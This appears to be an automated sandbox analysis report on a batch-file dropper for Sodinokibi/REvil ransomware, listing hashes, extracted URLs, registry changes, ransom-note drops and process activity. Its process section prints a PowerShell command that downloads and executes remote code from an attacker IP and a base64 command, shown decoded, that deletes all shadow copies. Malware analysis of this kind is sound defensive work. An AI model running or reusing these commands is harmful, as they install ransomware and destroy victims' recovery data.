Analysis
- max time kernel: 138s
- max time network: 138s
- platform: windows7_x64
- resource: win7v200430
- submitted: 01-05-2020 04:10
- Static task: static1
- Behavioral task behavioral1: Sample 4tM71hqZ.bat, Resource win7v200430
- Behavioral task behavioral2: Sample 4tM71hqZ.bat, Resource win10v200430
General
- Target: 4tM71hqZ.bat
- Size: 198B
- MD5: b883baec628ab0b3bae209a8d1d0a339
- SHA1: 79bbacc2b6ed81d4146b58f8a100fb83acba1e0c
- SHA256: 4c2d46061923d9aec3c2a9788f4c17d1815adf849edfe6acc0a0343a5484b752
- SHA512: 17cdc7879abe666c1893a5cf17d63ae9d22804a76c2d11a623a68118ac2ef0043c40ae6c2a8c558161bd180ab1d4bcd38342a88ae319fd57ecb7daf7b50d2735
Malware Config
- Extracted: http://185.103.242.78/pastes/4tM71hqZ
- Extracted: C:\39p89ngw-readme.txt (sodinokibi)
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D8BD55EFC979DC01
  - http://decryptor.cc/D8BD55EFC979DC01
Signatures
-
Modifies system certificate store
Processes: powershell.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (powershell.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob (powershell.exe); the blob carries the DST Root CA X3 root certificate, whose name is embedded in the data
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A (powershell.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob (powershell.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (powershell.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob (powershell.exe)
Note: writes under AuthRoot\Certificates are also produced by Windows' automatic root certificate update when a process validates a TLS chain ending in a root not yet cached, so on its own this signature is weak evidence; the network activity below is the stronger indicator.
-
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes: cmd.exe, powershell.exe
- PID 316 wrote to memory of 1096 (cmd.exe -> powershell.exe)
- PID 1096 wrote to memory of 904 (powershell.exe -> powershell.exe), reported 4 times
-
Modifies service 2 TTPs 4 IoCs
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dtm704z1q753.bmp" (powershell.exe)
-
Drops file in System32 directory 1 IoCs
Processes: powershell.exe
- File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt (powershell.exe)
-
Drops file in Program Files directory 27 IoCs
Processes: powershell.exe
Ransom note dropped (File created):
- \??\c:\program files\39p89ngw-readme.txt
- \??\c:\program files (x86)\39p89ngw-readme.txt
- \??\c:\program files\microsoft sql server compact edition\39p89ngw-readme.txt
- \??\c:\program files\microsoft sql server compact edition\v3.5\39p89ngw-readme.txt
- \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\39p89ngw-readme.txt
File opened for modification:
- \??\c:\program files\GetGroup.mpeg3
- \??\c:\program files\ResolveInstall.potm
- \??\c:\program files\RestartWrite.css
- \??\c:\program files\RevokeSet.aifc
- \??\c:\program files\CheckpointResize.zip
- \??\c:\program files\EnableOut.jfif
- \??\c:\program files\WatchExpand.m4v
- \??\c:\program files\ConvertFromUnregister.easmx
- \??\c:\program files\CopyFormat.vsdm
- \??\c:\program files\AddRevoke.mpeg3
- \??\c:\program files\HideEnter.vsd
- \??\c:\program files\ResolveShow.mp2
- \??\c:\program files\ShowConfirm.mht
- \??\c:\program files\UnpublishCompress.mpeg
- \??\c:\program files\ImportLock.midi
- \??\c:\program files\PushUnlock.sql
- \??\c:\program files\RegisterEdit.MTS
- \??\c:\program files\MountTrace.mp2
- \??\c:\program files\RegisterUpdate.avi
- \??\c:\program files\EnableBlock.asx
- \??\c:\program files\InstallExpand.xhtml
- \??\c:\program files\MountPublish.xml
-
Makes http(s) request 57 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes: powershell.exe
-
Enumerates connected drives 3 TTPs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes: powershell.exe
- PID 1096 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes: powershell.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1096 powershell.exe
- Token: SeDebugPrivilege, PID 1096 powershell.exe
- Token: SeDebugPrivilege, PID 904 powershell.exe
- Token: SeBackupPrivilege, PID 1796 vssvc.exe
- Token: SeRestorePrivilege, PID 1796 vssvc.exe
- Token: SeAuditPrivilege, PID 1796 vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 1096 powershell.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes: powershell.exe, powershell.exe
- PID 1096 powershell.exe, reported 3 times
- PID 904 powershell.exe, reported 2 times
-
Blacklisted process makes network request 191 IoCs
Processes: powershell.exe (PID 1096)
Processes
-
- C:\Windows\system32\cmd.exe (PID 316)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\4tM71hqZ.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1096, child of 316)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4tM71hqZ');Invoke-MPVDCPFRXOEJGHA;Start-Sleep -s 10000"
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    - Sets desktop wallpaper using registry
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 904, child of 1096)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      That is, deletion of every Volume Shadow Copy, which is consistent with the vssvc.exe activity recorded below.
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
-
- C:\Windows\system32\vssvc.exe (PID 1796)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken